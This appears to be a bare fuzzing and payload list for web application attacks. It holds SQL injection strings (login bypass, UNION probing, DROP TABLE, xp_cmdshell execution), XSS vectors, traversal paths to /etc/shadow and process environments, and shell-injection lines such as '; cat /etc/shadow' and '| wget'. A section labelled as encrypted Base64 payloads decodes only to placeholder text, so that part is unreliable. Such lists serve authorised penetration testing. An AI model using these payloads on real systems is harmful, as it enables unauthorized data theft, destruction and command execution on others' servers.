# SQL Injection Payloads
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /* 
' OR '1'='1' #
' OR 1=1 --
' OR 1=1 #
' OR 1=1 /*
' OR x=x --
' OR x=x #
' OR x=x /*
' OR 'x'='x --
' OR 'x'='x #
' OR 'x'='x /*
' OR ''=' --
' OR 1=1; --
' OR 1=1; #
' OR 1=1; /*
' OR 'a'='a
' OR 'a'='a' --
' OR 'a'='a' #
' OR 'a'='a' /*
' OR 'a'='a --
' OR 'a'='a #
' OR 'a'='a /*
' OR ''=''
' OR SLEEP(10)--
' OR SLEEP(10)# 
' OR SLEEP(10)/*
' OR BENCHMARK(1000000,MD5(1))#
' OR BENCHMARK(1000000,MD5(1))/*
-1' OR 1=1 --
-1' OR 1=1 #
-1' OR 1=1 /*
1' AND 1=1 --
1' AND 1=1 #
1' AND 1=1 /*
1' AND '1'='1
1' AND '1'='1' --
1' AND '1'='1' #
1' AND '1'='1' /*
1' OR 1=1 --
1' OR 1=1 #
1' OR 1=1 /*
1' OR '1'='1
1' OR '1'='1' --
1' OR '1'='1' #
1' OR '1'='1' /*
admin'--
admin' #
admin'/*
admin' --
admin' #
admin' /*
admin' AND 1=1 --
admin' AND 1=1 #
admin' AND 1=1 /*
admin' OR 1=1 --
admin' OR 1=1 #
admin' OR 1=1 /*
admin' UNION SELECT NULL,NULL,NULL --
admin' UNION SELECT NULL,NULL,NULL #
admin' UNION SELECT NULL,NULL,NULL /*

# XSS Payloads
<script>alert('XSS')</script>
"><script>alert('XSS')</script>
"><img src=x onerror=alert('XSS');>
"><svg onload=alert('XSS')>
"><body onload=alert('XSS')>
"><iframe src="javascript:alert('XSS');"></iframe>
"><img src="javascript:alert('XSS');">
"><embed src="javascript:alert('XSS');">
"><object data="javascript:alert('XSS');">
"><svg><script>alert('XSS')</script></svg>
"><svg/onload=alert('XSS')>
<svg onload=alert('XSS')>
"><marquee onstart=alert('XSS')>
"><audio src onloadstart=alert('XSS')>
"><video src onloadstart=alert('XSS')>
"><details open ontoggle=alert('XSS')>
"><style>@keyframes x{}</style><x style="animation-name:x" onanimationstart="alert('XSS')">
"><input onfocus=alert('XSS') autofocus>
"><img src=x onerror=alert(1)>
"><img src=x onerror=alert('XSS')>
<svg><desc><![CDATA[><script>alert('XSS')]]></desc><circle r="400"></circle></svg>
"><input onfocus=alert('XSS') autofocus>
<iframe src=javascript:alert('XSS')>
<math><mtext><img src=x onerror=alert('XSS')></mtext></math>
<math><maction xlink:href="javascript:alert('XSS')"><mtext>Click Me</mtext></maction></math>
<marquee onstart=alert('XSS')>
<video><source onerror="alert('XSS')">
<keygen autofocus onfocus=alert('XSS')>
<body onpageshow=alert('XSS')>

# Directory Traversal Payloads
../../../../etc/passwd
../../../../etc/shadow
../../../../etc/hosts
../../../../etc/group
../../../../etc/security/passwd
../../../../etc/security/user
../../../../etc/security/limits.conf
../../../../etc/security/limits.d/90-nproc.conf
../../../../proc/self/environ
../../../../proc/version
../../../../proc/cpuinfo
../../../../proc/meminfo
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/shadow
../../../../../../../../../../etc/hosts
../../../../../../../../../../etc/group
../../../../../../../../../../etc/security/passwd
../../../../../../../../../../etc/security/user
../../../../../../../../../../etc/security/limits.conf
../../../../../../../../../../etc/security/limits.d/90-nproc.conf

# Command Injection Payloads
; ls -la
| ls -la
&& ls -la
|| ls -la
| cat /etc/passwd
; cat /etc/passwd
| cat /etc/shadow
; cat /etc/shadow
`cat /etc/passwd`
$(cat /etc/passwd)
$(ls -la)
| whoami
; whoami
| id
; id
| uname -a
; uname -a
`uname -a`
$(uname -a)
| ping -c 1 127.0.0.1
; ping -c 1 127.0.0.1
| ping -n 1 127.0.0.1
; ping -n 1 127.0.0.1
| curl http://example.com
; curl http://example.com
| wget http://example.com
; wget http://example.com

# Additional Payloads
'<img src=x onerror=alert(1)>
' UNION SELECT NULL,NULL,NULL --
' UNION SELECT username,password FROM users --
' UNION SELECT 1,@@version --
' UNION SELECT 1,2,3,4 --
' UNION SELECT 1,2,3,4,5 --
' UNION SELECT 1,2,3,4,5,6 --
' UNION SELECT 1,2,3,4,5,6,7 --
' UNION SELECT 1,2,3,4,5,6,7,8 --
' UNION SELECT 1,2,3,4,5,6,7,8,9 --
' UNION SELECT 1,2,3,4,5,6,7,8,9,10 --
' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11 --
' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 --
' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 --
' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 --
' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --
' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 --
' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 --
' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 --
' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 --
' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 --

# Encrypted Payloads (Base64)
U29tZSBwYXlsb2FkIC4uLg==
U29tZSBwYXlsb2FkID0gMQ==
U29tZSBwYXlsb2FkID0gMSAtLSBzZWxlY3QgKiBmcm9tIHVzZXJzIC0t
U29tZSBwYXlsb2FkID0gMSAtLSBzcWwgZHVtcA==
U29tZSBwYXlsb2FkID0gMSAmJiB1bmFtZSAtYSA=
U29tZSBwYXlsb2FkID0gMSB8fCBpZA==
U29tZSBwYXlsb2FkIG9yIDE9MQ==

# Obfuscated Payloads
'; DROP TABLE users; --
'; SELECT * FROM users WHERE 'a'='a
'; EXEC xp_cmdshell('ping 127.0.0.1'); --
'; UNION SELECT NULL,NULL,NULL; --
'; WAITFOR DELAY '0:0:5' --
'; EXEC sp_executesql N'select * from users where 'a'='a'
'; EXEC xp_cmdshell('dir'); --
'; EXEC xp_cmdshell('whoami'); --

# Fuzzing Payloads
' AND 1=1 --
' AND 1=1 #
' AND 1=1 /*
' AND 1=1; --
' AND 1=1; #
' AND 1=1; /*
' AND 1=1; SELECT @@version --
' AND 1=1; SELECT @@version #
' AND 1=1; SELECT @@version /*
' AND 1=1; SELECT 1,2,3 --
' AND 1=1; SELECT 1,2,3 #
' AND 1=1; SELECT 1,2,3 /*
' AND 1=1; UNION SELECT NULL,NULL,NULL --
' AND 1=1; UNION SELECT NULL,NULL,NULL #
' AND 1=1; UNION SELECT NULL,NULL,NULL /*
' AND 1=1; EXEC xp_cmdshell('ping 127.0.0.1') --
' AND 1=1; EXEC xp_cmdshell('ping 127.0.0.1') #
' AND 1=1; EXEC xp_cmdshell('ping 127.0.0.1') /*
' AND 1=1; WAITFOR DELAY '0:0:5' --
' AND 1=1; WAITFOR DELAY '0:0:5' #
' AND 1=1; WAITFOR DELAY '0:0:5' /*

# Combined Payloads (SQLi + XSS)
' OR '1'='1 -- <script>alert('XSS')</script>
' OR '1'='1' -- <img src=x onerror=alert('XSS');>
' OR '1'='1' /* <svg onload=alert('XSS')>
' OR '1'='1' # <body onload=alert('XSS')>
' OR 1=1 -- <iframe src="javascript:alert('XSS');"></iframe>
' OR 1=1 # <img src="javascript:alert('XSS');">
' OR 1=1 /* <embed src="javascript:alert('XSS');">
' OR x=x -- <object data="javascript:alert('XSS');">
' OR x=x # <svg><script>alert('XSS')</script></svg>
' OR x=x /* <svg/onload=alert('XSS')>

# Advanced SQL Injection Payloads
-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10 --
-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 --
-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 --
-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --
-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 --
-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 --
-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 --
-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 --
